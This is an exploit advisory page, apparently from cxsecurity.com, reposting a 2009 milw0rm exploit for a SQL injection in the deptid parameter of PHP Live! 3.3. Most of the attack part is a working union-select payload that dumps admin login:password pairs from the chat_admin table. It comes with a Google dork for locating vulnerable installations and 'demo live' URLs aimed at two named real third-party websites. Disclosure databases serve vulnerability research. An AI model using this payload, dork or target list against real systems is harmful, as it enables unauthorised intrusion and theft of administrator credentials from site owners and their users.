PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability

2009-09-03 / 2009-09-04
Credit: v3n0m
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[o] PHP Live! 3.3 (deptid) Remote SQL Injection --==[ Author ]==-- [+] Author : v3n0m [+] Contact : v3n0m666[at]live[dot]com [+] Blog : http://0wnage.wordpress.com/ [+] Group : YOGYACARDERLINK [+] Site : http://yogyacarderlink.web.id/ [+] Date : September, 02-2009 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Software : PHP Live! Chat [+] Version : v3.3 [+] Vendor : http://www.phplivesupport.com/ [+] Price : $49.95 [+] Vulnerable : Remote SQL Injection [+] Google Dork : "Powered by PHP Live! v3.3" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit: [+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin-- [-] Remote SQLi p0c: [+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin-- [xxx] = Valid x number [-] Demo Live: [+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin-- [+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin-- FYI: Think twice before you buy these vulnerable script for $49.95 ? ++++

References:

http://www.milw0rm.com/exploits/9578
http://0wnage.wordpress.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top